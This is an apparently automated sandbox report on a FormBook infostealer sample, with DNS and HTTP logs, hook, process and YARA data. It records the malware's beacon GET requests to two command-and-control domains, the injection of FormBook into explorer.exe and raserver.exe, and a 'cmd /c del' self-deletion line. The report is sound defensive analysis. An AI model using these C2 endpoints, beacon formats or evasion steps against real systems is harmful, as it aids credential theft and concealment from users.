                                        Jun 12, 2021 08:58:01.744715929 CEST53564488.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:02.097090006 CEST5917253192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:02.161220074 CEST53591728.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:02.846249104 CEST6242053192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:02.908121109 CEST53624208.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:03.773226023 CEST6057953192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:03.833061934 CEST53605798.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:08.391108036 CEST5018353192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:08.449613094 CEST53501838.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:08.876105070 CEST6153153192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:08.934951067 CEST53615318.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:17.089121103 CEST4922853192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:17.150459051 CEST53492288.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:45.281604052 CEST5979453192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:45.436830044 CEST53597948.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:56.410811901 CEST5591653192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:56.483880043 CEST53559168.8.8.8192.168.2.4
                                        Jun 12, 2021 08:58:58.555881023 CEST5275253192.168.2.48.8.8.8
                                        Jun 12, 2021 08:58:58.626697063 CEST53527528.8.8.8192.168.2.4
                                        Jun 12, 2021 08:59:06.180969000 CEST6054253192.168.2.48.8.8.8
                                        Jun 12, 2021 08:59:06.255776882 CEST53605428.8.8.8192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Jun 12, 2021 08:58:45.281604052 CEST192.168.2.48.8.8.80x2a48Standard query (0)www.gentrypartyof8.comA (IP address)IN (0x0001)
                                        Jun 12, 2021 08:59:06.180969000 CEST192.168.2.48.8.8.80x4b68Standard query (0)www.rsyueda.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Jun 12, 2021 08:57:05.951527119 CEST8.8.8.8192.168.2.40x52b2No error (0)a-0019.a.dns.azurefd.neta-0019.standard.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                        Jun 12, 2021 08:58:45.436830044 CEST8.8.8.8192.168.2.40x2a48No error (0)www.gentrypartyof8.comgentrypartyof8.comCNAME (Canonical name)IN (0x0001)
                                        Jun 12, 2021 08:58:45.436830044 CEST8.8.8.8192.168.2.40x2a48No error (0)gentrypartyof8.com66.235.200.146A (IP address)IN (0x0001)
                                        Jun 12, 2021 08:59:06.255776882 CEST8.8.8.8192.168.2.40x4b68No error (0)www.rsyueda.com23.82.229.132A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.gentrypartyof8.com
                                        • www.rsyueda.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.44976266.235.200.14680C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jun 12, 2021 08:58:45.487462997 CEST8357OUTGET /nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH HTTP/1.1
                                        Host: www.gentrypartyof8.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.44976523.82.229.13280C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jun 12, 2021 08:59:06.452203989 CEST8377OUTGET /nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH HTTP/1.1
                                        Host: www.rsyueda.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jun 12, 2021 08:59:06.651827097 CEST8378INHTTP/1.1 500 Internal Server Error
                                        Cache-Control: private
                                        Content-Type: text/html; charset=utf-8
                                        Server: Microsoft-IIS/8.5
                                        X-AspNet-Version: 4.0.30319
                                        X-Powered-By: ASP.NET
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Headers: *
                                        Access-Control-Allow-Methods: GET, POST, PUT, DELETE
                                        Date: Sat, 12 Jun 2021 06:59:03 GMT
                                        Connection: close
                                        Content-Length: 4082
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e6 9c aa e5 b0 86 e5 af b9 e8 b1 a1 e5 bc 95 e7 94 a8 e8 ae be e7 bd ae e5 88 b0 e5 af b9 e8 b1 a1 e7 9a 84 e5 ae 9e e4 be 8b e3 80 82 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 6e 61 76 79 3b 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <title></title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy;
                                        Jun 12, 2021 08:59:06.651859045 CEST8380INData Raw: 63 75 72 73 6f 72 3a 68 61 6e 64 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 33 39 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 20 77
                                        Data Ascii: cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width:
                                        Jun 12, 2021 08:59:06.651873112 CEST8381INData Raw: 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 3e e5 a0 86 e6 a0 88 e8 b7 9f e8 b8 aa 3a 3c
                                        Data Ascii: </tr> </table> <br> <b>:</b> <br><br> <table width=100% bgcolor="#ffffcc"> <tr> <td> <code><pre>[NullReferenc
                                        Jun 12, 2021 08:59:06.651887894 CEST8382INData Raw: 70 70 6c 69 63 61 74 69 6f 6e 2e 53 79 6e 63 45 76 65 6e 74 45 78 65 63 75 74 69 6f 6e 53 74 65 70 2e 53 79 73 74 65 6d 2e 57 65 62 2e 48 74 74 70 41 70 70 6c 69 63 61 74 69 6f 6e 2e 49 45 78 65 63 75 74 69 6f 6e 53 74 65 70 2e 45 78 65 63 75 74
                                        Data Ascii: pplication.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)-->...


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe

                                        Processes

                                        Process: explorer.exe, Module: user32.dll
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE9
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE9
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xE9
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xE9

                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:08:57:11
                                        Start date:12/06/2021
                                        Path:C:\Users\user\Desktop\XhU4EXUp0x.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\XhU4EXUp0x.exe'
                                        Imagebase:0x340000
                                        File size:907264 bytes
                                        MD5 hash:49C83ECEB8A816B959A778E5F2E78801
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmp, Author: Joe Security
                                        Reputation:low

                                        General

                                        Start time:08:57:15
                                        Start date:12/06/2021
                                        Path:C:\Users\user\Desktop\XhU4EXUp0x.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\XhU4EXUp0x.exe
                                        Imagebase:0xe60000
                                        File size:907264 bytes
                                        MD5 hash:49C83ECEB8A816B959A778E5F2E78801
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:08:57:18
                                        Start date:12/06/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:
                                        Imagebase:0x7ff6fee60000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:08:57:38
                                        Start date:12/06/2021
                                        Path:C:\Windows\SysWOW64\raserver.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\raserver.exe
                                        Imagebase:0x1370000
                                        File size:108544 bytes
                                        MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:08:57:42
                                        Start date:12/06/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe'
                                        Imagebase:0x11d0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:08:57:43
                                        Start date:12/06/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff724c50000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                        Reset < >

                                          Executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: 1: $j!}
                                          • API String ID: 0-2991400020
                                          • Opcode ID: 3c5b17b7e4c81c5f844770954b5590da93106289f09ee4fe5cbfb380fe58e224
                                          • Instruction ID: c33ae579b491dc0726d7241189a868cd6d5a4b4627b815c47d6cd6016b13a2b9
                                          • Opcode Fuzzy Hash: 3c5b17b7e4c81c5f844770954b5590da93106289f09ee4fe5cbfb380fe58e224
                                          • Instruction Fuzzy Hash: D4D13B74E0420ACFCB04CFA5D5859AEFBF2FF89301B24D5A9D805A7255D7349A46CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: 1: $j!}
                                          • API String ID: 0-2991400020
                                          • Opcode ID: 8af6cb11925a723646313f10cb6388368e4ea4429774d0ff0e8e59df56a7554d
                                          • Instruction ID: c599b0288f1b3c849d03b38d820c7ef41d796c55001a9a741318a5a53d96f2ed
                                          • Opcode Fuzzy Hash: 8af6cb11925a723646313f10cb6388368e4ea4429774d0ff0e8e59df56a7554d
                                          • Instruction Fuzzy Hash: 82D14DB4E0420ACFCB04CFA5D5859AEFBF2FF89301B24D5A9D805AB254D7349A46CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: Z$Z
                                          • API String ID: 0-3829148472
                                          • Opcode ID: 914d65d2e021ad4b889cf656e67bbea3fd3d16900d623898d954bd0324b982e6
                                          • Instruction ID: df5a3bad643832ca843597199f6cee53b1a313dfbddfc2fbe4dca1561b0da8e1
                                          • Opcode Fuzzy Hash: 914d65d2e021ad4b889cf656e67bbea3fd3d16900d623898d954bd0324b982e6
                                          • Instruction Fuzzy Hash: C6815E74D19208DFCB04CFA9D5845ADFBF6FB8A711F10A52AD026B7254D738DA428F24
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: <l
                                          • API String ID: 0-969013996
                                          • Opcode ID: 451adabce9f82ba9d956c41d42cac0e3615acbb4b8e4d3527a08ec6ab9b87b89
                                          • Instruction ID: c34d360c3dbb5b4cfa71e8fab8cb4cfc22a2ece18b8597ee4e648e4484300ad2
                                          • Opcode Fuzzy Hash: 451adabce9f82ba9d956c41d42cac0e3615acbb4b8e4d3527a08ec6ab9b87b89
                                          • Instruction Fuzzy Hash: 22D17074E00209CFCB14DFA8C484AAEFBF2FF48314F15855AE565AB355DB34AA46CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 976f769d646f5801fb895803f49056dacf8e6d35377631a14f923e5cff3c6088
                                          • Instruction ID: ca5c4cd22e6ad6609c641064e6e8a4a5f34bd4868e9a86ea0ea7d33a4e5e49b3
                                          • Opcode Fuzzy Hash: 976f769d646f5801fb895803f49056dacf8e6d35377631a14f923e5cff3c6088
                                          • Instruction Fuzzy Hash: 1A32B130B012049FDB15DB69C590BAEB7F6EF89706F1480AAE515DB392CB34EE05CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 42fd068006271b3b856dd89791a9a092695f0e6cf75fb49ecf59b6a8cf617315
                                          • Instruction ID: 03eabee9b63f433f5b7e205c5dde8ae431ef3a1659574dbc5a2b2d4f1b6f0ed2
                                          • Opcode Fuzzy Hash: 42fd068006271b3b856dd89791a9a092695f0e6cf75fb49ecf59b6a8cf617315
                                          • Instruction Fuzzy Hash: 30B16E74E002598FDF10CFA9C8857EEBBF2BF88315F14812AD825A7394DB749945CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 55487005f484af1b7d936f39c6e23680c7d32e4ff6f7f47f89ccc42b3b266f06
                                          • Instruction ID: e11c563152788ba11a5a86ea5e45ecbd8c7efe34332b9ccceb309c6c59b41ab2
                                          • Opcode Fuzzy Hash: 55487005f484af1b7d936f39c6e23680c7d32e4ff6f7f47f89ccc42b3b266f06
                                          • Instruction Fuzzy Hash: E0B18270E002098FDB10CFA9C9917EEFBF2AF88759F14812AE424EB354DB749945CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c13aeb175c5995802d8071d51708d7a16b14eaebb932cc4edcd94cf6825a7da8
                                          • Instruction ID: 4188bbfbfcb7b69ba1f870bb1332d67c6a4b78b542e1f043d33d1e0102ac61a4
                                          • Opcode Fuzzy Hash: c13aeb175c5995802d8071d51708d7a16b14eaebb932cc4edcd94cf6825a7da8
                                          • Instruction Fuzzy Hash: FB510571D0422ACFDB24CF65D984BEDBBB2BB89301F1495EAC41AA7250E7349AC58F10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3069bbb0a42deb75bc81017e0634e930778ad7438eba14969991d59778fbecc
                                          • Instruction ID: 8ff2e168932435f90d7fdb63dfdaf11712afbe4b1df70b5544118cf6b108ea5a
                                          • Opcode Fuzzy Hash: a3069bbb0a42deb75bc81017e0634e930778ad7438eba14969991d59778fbecc
                                          • Instruction Fuzzy Hash: 8F314470D45228DFDB009FA4D599BEEBBF1EF0A302F14546AE422B3381D7789A41CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.658874884.000000000B4E0000.00000040.00000001.sdmp, Offset: 0B4E0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d27b66a9a94b05a5f0e402d84b73ffefe338d4f5787a21af6651d715b8da9a07
                                          • Instruction ID: 4f876400278e8e788e21a730589595dad425d6df7ce4b96b746425886104d159
                                          • Opcode Fuzzy Hash: d27b66a9a94b05a5f0e402d84b73ffefe338d4f5787a21af6651d715b8da9a07
                                          • Instruction Fuzzy Hash: 61312270D05218DFDB10CFA5D4997EEBBB1EF09302F14542AE422B3281D7785A41CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B5DD8A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 78f848c642be9bbe11bbda82108f3d8046a59e9054da94de0480ac34faf12f10
                                          • Instruction ID: e6bc035183008467688a4d9337016aed7b4f844f9ef73a53e3607459ad65c6ef
                                          • Opcode Fuzzy Hash: 78f848c642be9bbe11bbda82108f3d8046a59e9054da94de0480ac34faf12f10
                                          • Instruction Fuzzy Hash: 5751B0B1D00209AFDB14CF9AC884ADEBBF5FF48314F24826AE819AB250D7749845CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B5DD8A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.653424229.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: eded7631e94057b56c6129a061d45e813e1d5107c38e3cad87264d4695fdeb1c
                                          • Instruction ID: c52e4ed1b8d92c9f683786f930da804c9f9604a75a9e9b7d962fc01d9d867af3
                                          • Opcode Fuzzy Hash: eded7631e94057b56c6129a061d45e813e1d5107c38e3cad87264d4695fdeb1c
                                          • Instruction Fuzzy Hash: F551C0B1D00209DFDB14CF99D980ADEBBB2FF48310F24826AE819AB250D7749945CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%
